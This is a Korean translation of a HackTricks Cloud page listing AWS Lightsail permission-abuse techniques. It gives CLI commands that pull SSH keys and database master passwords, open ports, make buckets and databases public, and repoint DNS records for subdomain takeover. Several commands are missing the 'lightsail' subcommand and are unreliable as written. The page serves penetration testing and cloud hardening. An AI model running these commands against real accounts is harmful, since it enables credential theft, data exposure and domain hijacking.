Korean - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Lightsail Privesc

htARTE (HackTricks AWS Red Team Expert)을 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

Lightsail

Lightsail에 대한 자세한 정보는 다음을 확인하세요:

pageAWS - Lightsail Enum

Lightsail은 사용자에게 속한 IAM 역할이 아닌 AWS 관리 계정에 속하는 IAM 역할을 사용하지 않는다는 점을 주의해야 합니다. 따라서 이 서비스를 이용하여 권한 상승을 할 수는 없지만, 코드, API 키 및 데이터베이스 정보와 같은 민감한 데이터가 이 서비스에서 발견될 수 있습니다.

lightsail:DownloadDefaultKeyPair

이 권한을 통해 인스턴스에 액세스하기 위한 SSH 키를 가져올 수 있습니다:

aws lightsail download-default-key-pair

잠재적 영향: 인스턴스 내에서 민감한 정보를 찾을 수 있습니다.

lightsail:GetInstanceAccessDetails

이 권한을 통해 인스턴스에 액세스하기 위해 SSH 키를 생성할 수 있습니다:

aws lightsail get-instance-access-details --instance-name <instance_name>

잠재적 영향: 인스턴스 내에서 민감한 정보를 찾을 수 있습니다.

lightsail:CreateBucketAccessKey

이 권한을 통해 버킷에 액세스할 수 있는 키를 얻을 수 있습니다:

aws lightsail create-bucket-access-key --bucket-name <name>

잠재적 영향: 버킷 내에서 민감한 정보를 찾을 수 있습니다.

lightsail:GetRelationalDatabaseMasterUserPassword

이 권한을 통해 데이터베이스에 액세스하기 위한 자격 증명을 얻을 수 있습니다:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

잠재적 영향: 데이터베이스 내에서 민감한 정보를 찾을 수 있습니다.

lightsail:UpdateRelationalDatabase

이 권한을 통해 데이터베이스에 액세스하기 위한 비밀번호를 변경할 수 있습니다:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

데이터베이스가 공개되지 않은 경우에도 다음 권한으로 데이터베이스를 공개로 만들 수 있습니다.

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

잠재적 영향: 민감한 포트에 접근할 수 있습니다.

lightsail:PutInstancePublicPorts

이 권한은 인터넷으로 포트를 열 수 있게 합니다. 이 호출은 지정되지 않은 포트를 닫을 수 있습니다.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

잠재적 영향: 민감한 포트에 접근 가능합니다.

lightsail:SetResourceAccessForBucket

이 권한은 추가 자격증명 없이 인스턴스에 버킷 액세스를 제공할 수 있습니다.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

잠재적 영향: 민감한 정보가 포함된 버킷에 대한 새로운 액세스 가능성.

lightsail:UpdateBucket

이 권한을 가진 공격자는 자신의 AWS 계정에 대한 버킷의 읽기 액세스 권한을 부여하거나 버킷을 모든 사람에게 공개로 설정할 수 있습니다.

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

잠재적 영향: 민감한 정보가 포함된 버킷에 대한 새로운 액세스 가능성.

lightsail:UpdateContainerService

이 권한을 가진 공격자는 컨테이너 서비스에서 개인 ECR에 대한 액세스 권한을 부여할 수 있습니다.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

잠재적 영향: 개인 ECR에서 민감한 정보를 얻을 수 있습니다.

lightsail:CreateDomainEntry

이 권한을 가진 공격자는 서브도메인을 생성하고 자신의 IP 주소로 연결할 수 있습니다 (서브도메인 탈취), 또는 도메인에서 이메일 스푸핑을 허용하는 SPF 레코드를 조작하거나, 심지어 메인 도메인을 자신의 IP 주소로 설정할 수 있습니다.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

잠재적 영향: 도메인 탈취

lightsail:UpdateDomainEntry

이 권한을 가진 공격자는 서브도메인을 생성하고 자신의 IP 주소로 연결(subdomain takeover)하거나, 도메인에서 이메일 스푸핑을 허용하는 SPF 레코드를 조작하거나, 심지어 메인 도메인을 자신의 IP 주소로 설정할 수 있습니다.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

잠재적인 영향: 도메인 탈취

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

前へAWS - Lambda Privesc次へAWS - Mediapackage Privesc

最終更新